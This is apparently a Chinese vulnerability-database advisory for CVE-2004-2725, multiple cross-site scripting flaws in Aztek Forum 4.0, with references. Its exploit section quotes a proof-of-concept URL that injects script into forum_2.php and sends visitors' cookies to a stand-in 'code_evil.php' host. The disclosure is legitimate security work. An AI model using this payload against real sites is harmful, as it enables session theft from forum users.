Aztek Forum多个输入确认漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1108273 漏洞类型 跨站脚本
发布时间 2004-11-12 更新时间 2007-10-10
CVE编号 CVE-2004-2725 CNNVD-ID CNNVD-200412-207
漏洞平台 PHP CVSS评分 4.3
|漏洞来源
https://www.exploit-db.com/exploits/24731
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200412-207
|漏洞详情
AztekForum4.0版本存在多个跨站脚本(XSS)漏洞。远程攻击者可以借助(1)(a)search.php中的search参数,(2)(b)subscribe.php中的email参数,以及(3)(c)forum_2.php中的标题参数来注入任意web脚本或HTML。
|漏洞EXP
source: http://www.securityfocus.com/bid/11654/info

Aztek Forum is reported prone to multiple input validation vulnerabilities. These issues may allow an attacker to carry out cross-site scripting and possibly other attacks.

All versions of Aztek Forum are considered vulnerable at the moment.

http://www.example.com/forum%20aztek/forum_2.php?msg=10
&return=')%3C/script%3E%3Cscript%3E%20% 20document.location=%20'www.example.com/code_evil.php?
cookie='%20+window.document.cookie;%20%20%3C/script%3E
|参考资料

来源:XF
名称:aztek-forum-xss(18057)
链接:http://xforce.iss.net/xforce/xfdb/18057
来源:BID
名称:11654
链接:http://www.securityfocus.com/bid/11654
来源:OSVDB
名称:11706
链接:http://www.osvdb.org/11706
来源:OSVDB
名称:11705
链接:http://www.osvdb.org/11705
来源:OSVDB
名称:11704
链接:http://www.osvdb.org/11704
来源:SECTRACK
名称:1012213
链接:http://securitytracker.com/id?1012213
来源:SECUNIA
名称:13202
链接:http://secunia.com/advisories/13202